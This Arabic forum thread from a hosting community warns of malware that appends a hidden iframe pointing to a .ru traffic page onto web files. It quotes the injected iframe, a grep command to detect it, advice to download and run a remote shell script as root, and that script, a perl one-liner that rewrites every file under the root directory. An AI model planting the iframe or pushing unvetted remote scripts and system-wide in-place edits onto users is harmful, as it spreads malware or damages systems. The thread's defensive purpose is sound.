النتائج 1 إلى 8 من 8

الموضوع: فيروس خطير ينتشر على سيرفرات اللينكس و اليونكس

  1. #1
    عضو فعال
    تاريخ التسجيل
    Jan 2002
    المشاركات
    1,185

    فيروس خطير ينتشر على سيرفرات اللينكس و اليونكس



    السلام عليكم

    انتشر فى الاسبوع الاخير فيروس يصيب الملفات من النوع
    php
    HTML
    و غيرها من ملفات الويب المعروفة .. الفيروس يقوم بإضافة كود HTML فى نهاية هذه الملفات الكود المضاف هو
    <IFRAME name='StatPage' src='http://www.norton-kaspersky.ru/new/traff.php' width=5 height=5 style='display:none'></IFRAME>

    للتأكد من وجود الفيروس على سيرفرك اتبع الاتى من خلال الروت اعطى الامر التالى بإستخدام الشل
    find /home -name '*.*' -print | xargs grep 'norton-kaspersky' /dev/null

    سوف يعطى لك الامر السابق تقرير بالملفات المصابة فى هذه الحالة يجب التخلص من الفيروس من كل الملفات المصابة فى السيرفر كاملا لعمل ذلك اعطى الامر التالى
    cd ..
    ثم نفذ الاوامر
    wget http://www.cairohost.com/scan/scan.sh
    sh scan.sh

    برمجة /
    خالد ممدوح
    http://vbzoom.com





    __________________
    Emanage Company
    128 El-Haram St - Giza
    www.emanage.net


  2. #2
    عضو سوبر نشيط
    تاريخ التسجيل
    Nov 2005
    المشاركات
    715


    جزاك الله خيرا على نشر الحمايه مجانا






  3. #3
    عضو نشيط
    تاريخ التسجيل
    May 2006
    المشاركات
    167


    أخي ممكن تضع لنا ملف الشل هذا على شكل تكست فايل ؟
    أو تضع كود الشل هنا على الصفحة كي نعرف ماذا يصنع بالضبط وكيف استطعت التخلص من هذا "الفيروس الخطير" ؟





    __________________
    ------------------------
    Moving with the web 2.0h era

  4. #4
    عضو نشيط جدا
    تاريخ التسجيل
    Sep 2006
    المشاركات
    352


    اقتباس المشاركة الأصلية كتبت بواسطة Bo3oof
    أخي ممكن تضع لنا ملف الشل هذا على شكل تكست فايل ؟
    أو تضع كود الشل هنا على الصفحة كي نعرف ماذا يصنع بالضبط وكيف استطعت التخلص من هذا "الفيروس الخطير" ؟

    نعم أخوى خالد لو تكرمت وتضع لنا الملف .





    __________________
    
    مستخدم العضوية:الامبراطـور .

    بريد:Mahmoud.Alutibe[at]Gmail.com

    +971509060998
    

  5. #5
    عضو سوبر نشيط
    تاريخ التسجيل
    Nov 2005
    المشاركات
    715


    انا سالت خالد
    قال تتبع الفيرس لغايه لما عرف طريقته وعمل حمايه ضده
    ووضعه للتحميل






  6. #6
    عضو نشيط
    تاريخ التسجيل
    Sep 2006
    المشاركات
    258


    كيف التخلص من الفايرس
    للأستضافة اتي ما عندها خاصية شل





    __________________
    Zhra.Net

  7. #7
    عضو فعال
    تاريخ التسجيل
    Jan 2002
    المشاركات
    1,185


    اخى يجب على صاحب السيرفر التخلص من الفيروس بنفسه لان الفيروس يصيب معظم ملفات السيرفر على المسارات
    /etc
    /usr
    /home

    و يجب التخلص من الفيروس من على السيرفر ككل حتى لا يعود مرة اخرى


    بخصوص المود الذى قوم بحذف الفيروس فهذه هى محتويات الملف
    echo "############### ar4host.com ##################
    ############### cairohost.com ##################
    ############### scaning ..... ##################"
    cd /
    find . -name "*.*" | xargs perl -pi -w -e "s/<IFRAME name='StatPage' src='http:\/\/www.norton-kaspersky.ru\/new\/traff.php' width=5 height=5 style='display:none'><\/IFRAME>/ /g;"

    الكود يبحث فى كل الملفات عن الفيروس و يعمل استبدال للكود بلا شىء





    __________________
    Emanage Company
    128 El-Haram St - Giza
    www.emanage.net

  8. #8
    عضو جديد
    تاريخ التسجيل
    Aug 2007
    المشاركات
    11





ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •  

أضف موقعك هنا| اخبار السيارات | حراج | شقق للايجار في الكويت | بيوت للبيع في الكويت | دليل الكويت العقاري | مقروء | شركة كشف تسربات المياه | شركة عزل اسطح بالرياض | عزل فوم بالرياض| عزل اسطح بالرياض | كشف تسربات المياة بالرياض | شركة عزل اسطح بالرياض